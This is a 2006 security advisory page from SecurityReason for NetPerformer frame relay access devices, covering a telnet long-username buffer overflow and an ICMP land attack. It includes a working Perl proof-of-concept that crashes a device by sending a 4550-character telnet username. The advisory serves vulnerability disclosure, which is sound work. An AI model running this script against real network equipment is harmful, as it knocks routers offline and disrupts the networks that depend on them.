|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 1583 CVE : CVE-2006-4833 CVE : CVE-2006-4832 SecurityRisk : Medium  (About) Remote Exploit : No Local Exploit : Yes Exploit Given : Yes Credit : arif jatmoko Published : 19.09.2006
Advisory Text : NetPerformer Frame Relay Access Device (FRAD) ACT Multiple Vulnerabilities .<=[ Arif Jatmoko ]=>. Release Date : 8 July 2006 Product Affected : - NetPerformer FRAD ACT SDM-95xx version 7.xx (R1), earlier, and possibly newer - NetPerformer FRAD ACT SDM-93xx version 10.x.x (R2), earlier, and possibly newer - NetPerformer FRAD ACT SDM-92xx version 9.x.x (R1), earlier, and possibly newer - .... Web Site : www.netperformer.com =.[DESCRIPTION].= NetPerformer Frame Relay Access Device (FRAD) is switching & routing device that support Ethernet and SNA protocols, Voice, etc. This device mainly used for connecting distributed WAN network through frame relay or ATM network. =.[DETAILS].= 1. Telnet long username Buffer Overflow. Passing an overly long username (>4550 char) against telnet service causes device to reboot. Successful remote exploitation will possibly allows an attacker gaining access into the device. ================================== 00.^.00================================== # __START_CODE # #!/usr/bin/perl use IO::Socket; use strict; my($socket) = ""; if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "23", Proto => "TCP")) { print "Modhiar'000 ..... killing netperformer ... $ARGV[0] port 23..."; sleep(1); print $socket "LOGIN " . "A" x 4550 . "BCDErn"; sleep(1); print $socket "PASS " . "rn"; close($socket); } else { print "Cannot connect to $ARGV[0]:23n"; } # __END_CODE ================================== 00.^.00================================== 2. ICMP Land Attack By sending specially crafted ICMP packets will causes the device to be hang up and resetting current TCP handshake connection. In earlier version possibly will make device to reboot. WORKAROUND No Workaround yet for this vulnerability. Vendor Response Status : Vendor response very slow since discovered the above vulnerabilities. Arif Jatmoko //=. Information System Security Officer Coca-Cola Bottling Indonesia  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Multiple Vendors libc/gdtoa printf(3) Array Overrun
SecurityReason realised new advisory about vulnerabilities libc/gdtoa... |
||
| Apache |  |
|
» Apache Tomcat |
||
» Apache Tomcat User |
||
| PHP | |
|
» PHP |
||
- 2009-05-30| Copyright © SecurityReason.com. All Rights Reserved. |